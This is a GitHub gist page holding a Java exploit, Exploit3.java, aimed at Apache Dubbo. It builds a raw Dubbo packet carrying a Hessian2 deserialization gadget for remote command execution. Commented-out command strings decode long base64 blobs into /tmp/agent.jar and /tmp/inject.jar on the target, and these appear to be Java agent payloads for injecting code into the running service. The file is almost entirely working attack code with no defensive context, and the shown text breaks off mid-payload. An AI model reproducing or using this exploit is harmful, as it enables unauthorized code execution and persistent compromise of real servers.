Skip to content

Instantly share code, notes, and snippets.

@yemoli

yemoli/Exploit3.java

Created December 29, 2022 02:08
Show Gist options
  • Star 4 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save yemoli/5b2f4abca69128f013b128d82110d37c to your computer and use it in GitHub Desktop.
Save yemoli/5b2f4abca69128f013b128d82110d37c to your computer and use it in GitHub Desktop.
Download ZIP
Raw
Exploit3.java
import com.alibaba.fastjson.JSONObject;
import org.apache.dubbo.common.io.Bytes;
import org.apache.dubbo.common.serialize.hessian2.Hessian2ObjectOutput;
import sun.misc.Unsafe;
import sun.print.UnixPrintServiceLookup;
import java.io.*;
import java.lang.reflect.Field;
import java.net.Socket;
import java.util.HashMap;
import java.util.Random;
import static org.apache.dubbo.common.utils.FieldUtils.setFieldValue;
public class Exploit3 {
public static void main(String[] args) throws Exception{
ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream();
byte[] header = new byte[16];
Bytes.short2bytes((short) 0xdabb, header);
header[2] = (byte) ((byte) 0x80 | 2);
Bytes.long2bytes(new Random().nextInt(100000000), header, 4);
ByteArrayOutputStream hessian2ByteArrayOutputStream = new ByteArrayOutputStream();
Hessian2ObjectOutput out = new Hessian2ObjectOutput(hessian2ByteArrayOutputStream);
/////////############################################
Field theUnsafe = Unsafe.class.getDeclaredField("theUnsafe");
theUnsafe.setAccessible(true);
Unsafe unsafe = (Unsafe) theUnsafe.get(null);
Object unix = unsafe.allocateInstance(UnixPrintServiceLookup.class);
setFieldValue(unix, "osname","hack");
//写agent.jar /tmp/agent.jar
// String cmds = "python3 -c \"import os;os.system('echo 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 | base64 -d > /tmp/agent.jar')\"";
//写/tmp/inject.jar
// String cmds = "python3 -c \"import os;os.system('echo UEsDBAoACAgIAM5ZjlXbYYpQnwAAANcAAAAUAAAATUVUQS1JTkYvTUFOSUZFU1QuTUZljrEKwyAUAHfBf/AHlEShFLckQ6EglA5dy6O+NKapKWoC+fuahE4dj7vhDHjXYkz8hiG60WtWioKSenJD4vWi2aIoqZ7oE28GiFEzs2xowHlKGvD8ihZb53EPMCcpTPhzKYCP7Rjef3pFfoHUadbDnMHlDSWkFAU/VaKHkKOAkNBuJ9UHHh0yAzN6psRBqP3T8rN9rd9HUdylLCmh5AtQSwcI22GKUJ8AAADXAAAAUEsDBAoAAAgAAM5ZjlUAAAAAAAAAAAAAAAAJAAAATUVUQS1JTkYvUEsDBAoAAAgAAM5ZjlUAAAAAAAAAAAAAAAAFAAAAaGFjay9QSwMECgAACAAAzlmOVQAAAAAAAAAAAAAAAA8AAABNRVRBLUlORi9tYXZlbi9QSwMECgAACAAAzlmOVQAAAAAAAAAAAAAAABsAAABNRVRBLUlORi9tYXZlbi9vcmcuZXhhbXBsZS9QSwMECgAACAAAzlmOVQAAAAAAAAAAAAAAACcAAABNRVRBLUlORi9tYXZlbi9vcmcuZXhhbXBsZS9hZ2VudF9kdWJiby9QSwMECgAICAgAzlmOVTKtJr58AwAAZgYAABYAAABoYWNrL015QWdlbnRNYWluLmNsYXNzjVTfdxNFFP6m2c0k221LU6JUfghYIKVtolQrNhWNLWihKdWUasuL080QFjebuNlw5N1/wldfeC6eU071yLv+RR4frN9uICRtHjhnz+zMN3fu/e5378zf//3+AsCHuG8hg/k0Zx+lsGDhY1yX+MSCiflhLKIYDUsWbHyaxjhuWPgMn0uUIvgLiWULo1hJ4abELYkvBcZX9APX15uB8lsPGkFdBwL2qu/rYNlTrZZuCaSdaLau6logs/ZIPVYFT/m1QiUMXL9WFEguub4b3hBI5Ka3BIzlRpWmY2v0u96u7+pgU+168eGGo7wtFbjR+iVohA/dVrT3UDk/FMpPSjXth2Xl+nScVtGizoVAMXc8dA/i+q0waNdpXljtTlXoNvxixEkwUrbH/OZPjm7Gu9xzKEPPXpx4N3opqJGeEfkXuPxmEQVGvIaq6mpXw8z9AQFGKiFzLqtmLIXEVxKrEjlWi4USsLok6SC15HgvVbYqjXbg6FtuJN+JHsXyUQgbb+OUxG0bd7AmMNGzf74VqiDM5yXKNtZxV+DiUdGnjrUDOdnYwNc2vkHFxibu2cjiLbK1sYVvWecjidn4DtsMPEBsGzs4xRMrut6o6OCx6+jVetNjFkd5EHp9/u7uI+2EfVCnAQSm3qQe/SeftEJdZ6822mG3J9xGYYMOQ7rVql58xb4fFpDNaOXRYXZAN0Z9Nqqq1b67VMgNbplYqqiEPdbFncjFRE2HJc9b62+gk7npQS0kady5mTQYeDf1j23ltY4w7ihanN5hZwY6fEWhGy2bOx4s4jbW7MjBapG3o3GBb0yG7xJvS9QVnCU4ZwdynOSqwL/g37z6HGKPkyG8wzEZgyM4zdHuGOAMzvKfxjm8SyseFheIpoipZxjKJPZhzPwBc/s5ksYBZAIzB0gJlGfX514sGIkFM2tmjV+xMJc1ry0mJ5P7SD+DtY/hX3BmxvgT9nZiMlk5wMgQnsJalJNyH2M/m+Lp4V97pFBik1f4OCZignkMcxxn+AyzmiC1k5hnhiXmtkHaFWZ4j5Y7xL8n5dPx22wSM3GeqkhaX8FFvMdUmQCmYm2i2SVcZrSzWOF+jolOE70O45BwUuKqxIzELD9BVQ4xC9kPSsyBQ/5fJP9hrAJPG/Q3Sqbvd1U/F0tKmTMnfoO1F9fnteyjjPpBXIprZA9YRE3mOoHU/1BLBwgyrSa+fAMAAGYGAABQSwMECgAICAgAzlmOVUSSSz5zAwAAlQYAABgAAABoYWNrL1Rlc3RBZ2VudE1haW4uY2xhc3OVVG13E0UUfqYJ3TTZhpK+YPEtimjaElZBRWgt1lIUSAKaGJAqMknGZGGzm7M7qfSn8Av8rB8i8MHjZ3+SHl+e2dDWlHpOSU5m5t557p3nmXsnv//99FcA76OdxizencB7OJvCuTQ9H6TxIc6b1UcZXMDFDJaxYoaPLaymkcalFD5JYw2fprBu7MsmYCOFK2b+zAyfW7hq4ZrA+Irru3pVIFFYqAsk14OWEjhacn1V6XcbKqzJhkdPrhQ0pVeXoWvsZ86k7riRwEypI5sPnJqK9Fpb+bosXX+Zu13OAnOFzdJ9uSUdT/ptp6pD128vm7OyW26o+9Iry2aHxwmcKjWDrhP1fUcHgRc5UmtuOfURGBMntrotAecw6MsqaoZuTwehISTDNulOH8CHm54baYGp4V5fu55Tooc7c6PSt3s78tf2YVdekNEqk09WiXlQlr04p4XrFkoC6Y2HTdXTbuBHFsq0q0E/bKorblyKkYs+YzjYmMNxCxUbN3CTiLDv+5SVv1Yv5yMtQ5238IWNL1G1ULNxCl8Zo87jbNzCbZ5p42vcsbGJbwSKLyTDxre4yzO7261+oxEUIxVuqZC0Qgvf2bgHSf4d5XnBD0HotWw0cNdGEyxh1tHdniONFIO3oVC18T2OM93zLcXi7NXtRuO+arJe2dESMHDPcVWrUJIhS74XuHuzI+mq25FWXbZW0GeO2WFh3cC5ye7Q7BElu8s7aUbdAlbPWB4TzhYO7vSTh7hQMi8sPN98IymHouOUKXdX3NxI3I5oxlodGVXUQx0/7jtscT82Znbw/80pkGm5Uc+T2xXZVftBu69kar+PTJTfim65uvM/+nnwmMtijw9lC1w4CHXIpz/hBbIVdwQTtpQB4Q3M8B/SfMYgzEPg+BIth7PgfGTxF4if4u15juOxM4UTHO0hAC/jFc4TeBWvEcVgQdL0A62fMZZLDJB8jCMlrpcGGF96AkugfPoJUgKPsM7FhMBvSFcIKA6QIdxMOXuAyUfImxTZoe/oY0xdTM4nc8cGyM0nB5j+8Z+nhlsy5naWjIAM2dn8TmIaWRSRw3mu1inzOoXWKHCTHO9RQZPMjY5FxtcY8TryXBVxjpfyJhKGP07irVjpbT77t6n3nWe6h54CVwv0HEPiL5ywsGhh6U9s/EH5p2Na/Dvg70x8fc6/UEsHCESSSz5zAwAAlQYAAFBLAwQKAAgICADOWY5Vg5UfcQ8GAACMDAAAKAAAAGhhY2svTXlBZ2VudE1haW4kRGVmaW5lVHJhbnNmb3JtZXIuY2xhc3OdVut31EQU/01bNtkQbGl5LYqGAjaLZYuKry1FaEul2pba1mLBB2l2ug1kk5BkoQsiD0V8v1+oHz18VOTD4pFz/AP8h/zm8U6y2+6jHDxmz85M7tzn796Zm7/++eNPAPvwk4JuTCRxFJMSXlbQigkZU2KeFsOMglcwK+OYglcxp+A4Tsh4Tcyvy3hDxpsSTirogCFI82IwZeQUcCzIyCdpXlRg4ZSM02K2xU5BDI4EV8E2eDLOiNmXEEooSjjLkNhvOVZ4gKFVT88ytA25Oc7QPmY5fKJYmOf+jDFvE6VzzDUNe9bwLfFeIbaFi1bAsH6YLxD/jG84wYLrF7jPoI46DveHbCMIOLHsHFs0zNN946VDee6E44bl7GwS6mdIhtVXhpP62CnjrNFnG06+L1I05ho5YqshT4e+5eT7GxkrhICbRd8KS32TvhtyM7RcZ9gtkO3+E4PpE4MMLabHsDFiDgIrCGPpSde1hS9m9GKEiwxbG3mGqnv9QovJ0FXLEcZeMDCKY0PdzjgPF90cbcnzpZDHaLdEvvClqi9xJIeXTO4Jn4k5YUehM2y+ByZVdyeMQpSsJojIw4hhkNPbFM9F4Ocod03YMXR4DXgxaPdDlGom0r9g2XywuLAgnN1UXzMlr1o3GxqN7t99gDSsmw6pSMYNL2KjomVQllEIJJyjKKetvGOERZ+0mP+/QIS9/1gjyrRb9E0+YgnHO2oKOCPkVezELglLKko4T+lptDxYtOwocV2ez4VaTWRSi5zIqriAt1RcxNsSLqm4jCuE4jAvuNPcP2uZfLTg2RKuqngH70q4puI9XCdNwkbGcjOjjlcMyQw3CireF8KpVbameFw5m6p7cXZ4rrqx5V6lLWL7QMWH+EjFx/iESjYwSke4bbsSPlXxGT5nWMttwwt4bsYqcBVfYJ+EL1V8ha8Z+4UQNXkQaN6AU7TtfkWrPKFf0i4sv4nH0wa0qaITkpJMnoeVpZ7O8CVu6g4/p8Vo6t2mEWp9C7aR706nVzReJLK5qOnLxaLxdL2F6VIQ8kLGLYYZjzSFtqPzWgXLqxrktAUrGPCEQzVEvUaqCWXNCvwB4W7Tjk66aiTrc6DNx1L1VJ2U1YjECGg2HdsGPM8tUm3qerQz72fIaE5c33o6vT3iTDeg7XM6P06kqQYBFd/giopv8Z2K77GrUmcNV5GKG2JL4b7v+lnxqPhBlO+PDN33v+HpAK0oPTp/is4bQ3qFZDlB6BcLJB+Xojh0deJ7V+UdtW2eN+xYhDiNcNnhOotxEVCrozJYvmstl44+VUScLXHXGp7HHboa9+jNF0m6iVQ54eJGD92YRBec3szYX4W03iKDVKlIcmk1i7P1MVQsJPiZomEHDTIxpv3p4xVbDV2NMkfVTGkxijYhsLniZXPvW2cVPNcPJymjRl5c2E1XbeRXOyWB++HQSqPs1Zs0iibZbCduna3kDkPPPYFu7Kfrm4hEi0Ki5kMnJ+6uDPp9Na70Ydt18qI3UdtsZiDsjVyuro+trn0VdwVCaozQIKcKJkkldAep7ZtR22/TowaTyHFqe4RduxdXBYFORW/yOFvjdIVGOehoPF/QsJ0+KBl20NdlC/2pFdHbo7Tqo5nRvGb3HbDfou0eGhMRUYNOoxozII1emqnakaFvUBJmv9K8lmg3b6PlLlrn7qCtc00ZiV76lyGVIXcmaa3cwLXfsTabSCU61TLW0fRAPLXTdBcdc3vuYH1WSiVSJNN5jDaSZXRl5ZTcuaGMjdlkKtm56TY2l7GFVqkytqbkMh7MKmJ6KKXcEqrLeLjGjUfIBUHTll1ht8j3blyi7rkNbVGUE+iicQdSBEg3RdRDvwzF/BTFuh+7MYLHiKcXxyjmk7RzCntxBs9jCQepFx8iTYO4iiFcxzB+xpEIrfOEVw/mCNi9hOIIsngcT0AiHWk8SZ/2MmnSyMLTSJIeGc/gWSikpRvPEW9CoFlBWqz6yQ8WrQZwIErdTbJ/kHAXq0Nkvy1aDZGWNeRFNVuC6zBxjdA6iZa/cVnCCzvIRZAAwyhejFL9Ev3HotU4hQpyhFGlBBS6/C9QSwcIg5UfcQ8GAACMDAAAUEsDBAoACAgIAMhZjlXNSZodbwIAAJUHAAAuAAAATUVUQS1JTkYvbWF2ZW4vb3JnLmV4YW1wbGUvYWdlbnRfZHViYm8vcG9tLnhtbI1V247aMBB95ysQ77G59AEhb1YItd1W0EVlu+rbyiQmmCZ2ZDtc/r4TG7JJSAAekHzmzMVnxhPyfEzi7p4pzaV46g1Qv9dlIpAhF9FT78/bN2/ce/Y7JFVyxwLTBbbQT72tMekE44TumUA0pcGWIakivHxd4C+oD1E63cvPukyOmhduh8MBHUbWYdjvD/DfxXwFERLqcaENFQEru2s+0dY6lwE1tsy76bttjKMOHehZHoJzz7fJSCJDFr87JXxrJbiCdRwvUjJLf4Q+hEPsSJM0ZgRfQEehyvANDQwANGLCfITZei0JLuGOeBbeB9291a/pcvXy+kbwvpoQtE8ZeDLtF7IQd7NAJimPmUJaZipg/pjgZkOro6EqYqbB8WxwJeB6DSRkKRMhjEq1rAI+fYJXqu3onmrNtanpVpBLOpW4dfUK+kWvERoOQcjv05KEBQk3lXa/XtAD6Uw8UKmRMtYPVDlA43y0riq0JB2Azr4+acMSgt2pxrC2JTVbH8/5WlF1wj9BJPv3zpXJaLyAeeeCabwL/9l0H8PhAMEBz6QwMJAav8iE4ZivsS0bWqIg3WfoG7qVENt7B64zHpduTNI4i+A114p3aBW8Go/zc3XzeI7Ton+9B+5pw2U859fejkpLRmjQ2hJLDKTY8ChTdv9c289lgOh71my1jIQKvmHatFNcoDCcxTD0ad4IozJYLxWoPQG+n6Eo4qswqvJ2G9nTfH15Nre/ONnTgua6lg23Q8yo8H6zkG1gIp0DZHXXajQ9Es0oKvRGqqQx4LX1Aclu6pHPUUt3Cb4xHLA4axN/QS57FJ8fjl2x+ScWHtR/UEsHCM1Jmh1vAgAAlQcAAFBLAwQKAAgICADOWY5VQXJLKGAAAABfAAAANQAAAE1FVEEtSU5GL21hdmVuL29yZy5leGFtcGxlL2FnZW50X2R1YmJvL3BvbS5wcm9wZXJ0aWVzU3YuSk0sSU1RSKpUcCxITM5IVfBNLEvNUzDWM9Mz5ipLLSrOzM+zNdQz0A32cwwI9vAP4Uovyi8t8EyxzS9K10utSMwtyEnlSiwqyUxLTC4BCiemp+aVxKeUJiXlcwEAUEsHCEFySyhgAAAAXwAAAFBLAQIUAxQACAgIAM5ZjlXbYYpQnwAAANcAAAAUAAAAAAAAAAAAAACkgQAAAABNRVRBLUlORi9NQU5JRkVTVC5NRlBLAQIUAwoAAAgAAM5ZjlUAAAAAAAAAAAAAAAAJAAAAAAAAAAAAEADtQeEAAABNRVRBLUlORi9QSwECFAMKAAAIAADOWY5VAAAAAAAAAAAAAAAABQAAAAAAAAAAABAA7UEIAQAAaGFjay9QSwECFAMKAAAIAADOWY5VAAAAAAAAAAAAAAAADwAAAAAAAAAAABAA7UErAQAATUVUQS1JTkYvbWF2ZW4vUEsBAhQDCgAACAAAzlmOVQAAAAAAAAAAAAAAABsAAAAAAAAAAAAQAO1BWAEAAE1FVEEtSU5GL21hdmVuL29yZy5leGFtcGxlL1BLAQIUAwoAAAgAAM5ZjlUAAAAAAAA